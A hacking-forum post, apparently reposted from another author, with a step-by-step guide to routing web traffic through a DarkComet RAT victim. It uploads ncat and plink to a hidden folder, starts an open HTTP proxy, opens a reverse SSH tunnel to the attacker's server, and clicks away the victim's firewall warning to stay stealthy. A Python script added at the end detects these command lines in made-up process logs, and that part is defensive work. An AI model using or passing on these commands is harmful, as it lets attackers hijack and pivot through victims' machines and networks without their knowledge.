
Advanced Proxying to use DarkComet Slaves to surf the web


#1
_)_

Hi,
Found this on the web :) or rather "Annohack" did ^_^
Haven't gotten around to testing it yet, but it sounds really plausible and it should work.
So copy-paste credits go to Annohack :)
Disclaimer: This post is for educational purposes of learning network security.
I am not responsible for what you do with this information.

How to use your slave's connection to browse the internet.

So you want to surf using a dark comet slave? Wait, there is an option in Dark Comet to turn the slave into a proxy! Oh wait, it doesn't work? Why not?
Because your slave is most likely behind a router and you lack basic firewall understanding. Come sit children, and AnonHack will show you the way.

What you will need:
  • SSH Server - best bet would be to install OPENSSH on your computer
  • A port forward rule on port 22 to your ssh server on your router
  • A browser where you can use proxy settings - I recommend using foxyproxy w/ firefox
  • Plink
  • ncat - a command line tcp/ip tool.
  • Slave (DarkComet Victim)

Because your slave is behind a router, he essentially has a poor man's firewall from the outside world. The whole reason you can see the slave online after ratting is because the slave's computer is making an outbound connection to your ip which is then being forwarded to the computer on your network that you specified when port forwarding. Open up a port on your router/firewall to point to the same machine and install openSSH server.

Now find a good place to upload plink.exe and ncat.exe on the slave's machine. I recommend C:/users/[USERNAME]/appdata .. Make sure the user can't find those files.

Now on Dark Comet, open up the remote shell tab. This will give you a command prompt on the slave's machine. Navigate to the directory where you uploaded ncat & plink.exe in.

Type in the following:


ncat.exe -lvk 8080 --proxy-type http --allow *.*.*.*


You've officially started a proxy server on the slave's machine. BE WARNED when you do this they might get a firewall popup that asks them to keep blocking or unblock.
My recommendation is to use the remote desktop and watch the slave machine and click the "unblock" button quickly to remain stealthy.

Now you can't just use the proxy server yet because your slave is behind a router, and a direct connection is just going to get refused. Now comes the reverse SSH tunnel which will allow you to tunnel traffic through it.

Close the remote shell window in Dark Comet and reopen it, the ncat listener is still being run in the background on the slave's machine so don't worry.

Now type in the following:-

plink.exe -R 3128:127.0.0.1:8080 [youripaddress] -l [yoursshlogin] -pw [yoursshpw]


It's going to ask you if you want to cache the server, yadda yadda..type N for no. Because you don't want to leave a footprint on the slave's machine. At this point you should be left with a shell to your ssh server, from the remote shell..(I know, it's confusing...shell in a shell!)

What did we just do?
Let me break it down. You're making an ssh connection back to your ssh server from the slave. SSH is very useful for tunneling traffic mostly because you don't need to keep adding port forwarding rules to your router and the traffic is encrypted.

plink.exe - obviously this is the executable you are running on the slave's machine
-R - this is the remote directive. When you make a connection, it will open up a port on the server and a port on the local machine
3128 - this is the port on the ssh server you're opening up...
[link hidden for guests] - this is the address you're going to hit on the SLAVE'S Network once you tunnel traffic through port 3128 on YOUR network (hint...you could just change this if you were interested in hitting a machine on the same network as the slave..use your imagination)
8080 - this is the port you're going to come out on @ [link hidden for guests]



Now the last thing to do is set up the browser to use foxy proxy or another proxy tool to point at [link hidden for guests] on port 3128. This traffic will be piped through the attacker's port 3128 which is part of the ssh tunnel and send it to the local machine on the slave's end on port 8080, which is the ncat listener/proxy. Go to google in the browser and type in "what's my ip address". It should be your slave's wan address now, which would match up to what you have in the dark comet window.

Quick summary logic.
  • Install ssh server on attacking machine
  • Port forward port 22 on your router to the ssh server computer
  • Upload ncat and plink to slave in a discreet place
  • start ncat listener in remote shell window : ncat.exe -lvk 8080 --proxy-type http --allow *.*.*.*
  • close remote shell window and reopen, run plink.exe -R 3128:127.0.0.1:8080 [youripaddress] -l [yoursshlogin] -pw [yoursshpw]
  • setup attacking browser to proxy connection to [link hidden for guests] on port 3128.


Now use your imagination to what you can access from here? (hint: slave's router maybe?)

Please show some love if this guide helped you. It was made with a lot of experimentation and patience.
  • Lorino likes this
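
Seen from the defending side, the two commands in the post leave distinctive process-creation arguments on the affected host. The following is an added example, not part of the original post: it flags a listener started with a proxy type and an SSH remote forward by their arguments rather than by file name, since the binaries can be renamed. The event records, host names and finding labels are constructed for illustration.

```python
import re
import shlex

# Constructed process-creation records (Sysmon Event ID 1 style); all values are made up.
SAMPLE_EVENTS = [
    {"host": "WS-014", "image": r"C:\Users\alice\AppData\ncat.exe",
     "cmdline": "ncat.exe -lvk 8080 --proxy-type http --allow *.*.*.*"},
    {"host": "WS-014", "image": r"C:\Users\alice\AppData\plink.exe",
     "cmdline": "plink.exe -R 3128:127.0.0.1:8080 203.0.113.10 -l user -pw secret"},
    {"host": "WS-020", "image": r"C:\Program Files\PuTTY\plink.exe",
     "cmdline": "plink.exe -batch admin@build01 uptime"},
]

# [bind_address:]port:host:hostport, the argument format of an SSH remote forward.
REMOTE_FWD = re.compile(r"^(?:[^:]*:)?(\d{1,5}):([^:]+):(\d{1,5})$")
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.I)

def findings_for(event):
    """Return the list of findings for one process-creation event."""
    args = shlex.split(event["cmdline"], posix=False)[1:]
    found = []
    # A listener (-l inside a short-option cluster, or --listen) that also speaks a proxy protocol.
    listening = any(a == "--listen" or re.fullmatch(r"-[A-Za-z]*l[A-Za-z]*", a) for a in args)
    if listening and "--proxy-type" in args:
        found.append("listening-proxy")
    for i, arg in enumerate(args):
        if arg == "-R" and i + 1 < len(args):
            m = REMOTE_FWD.match(args[i + 1])
            if m:
                found.append(f"reverse-forward {m.group(1)}->{m.group(2)}:{m.group(3)}")
        if arg == "-pw":
            found.append("ssh-password-on-cmdline")
    # Context only: raise priority when a flagged binary runs from a user-writable directory.
    if found and USER_WRITABLE.search(event["image"]):
        found.append("user-writable-path")
    return found

def triage(events):
    """Group findings per host so both halves of the tunnel show up together."""
    hits = {}
    for ev in events:
        result = findings_for(ev)
        if result:
            hits.setdefault(ev["host"], []).extend(result)
    return hits

if __name__ == "__main__":
    for host, result in triage(SAMPLE_EVENTS).items():
        print(host, result)
```

A host that shows both "listening-proxy" and a "reverse-forward" to the same local port is the combination described in the post; the outbound SSH session to an unfamiliar address is the matching network-side signal.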
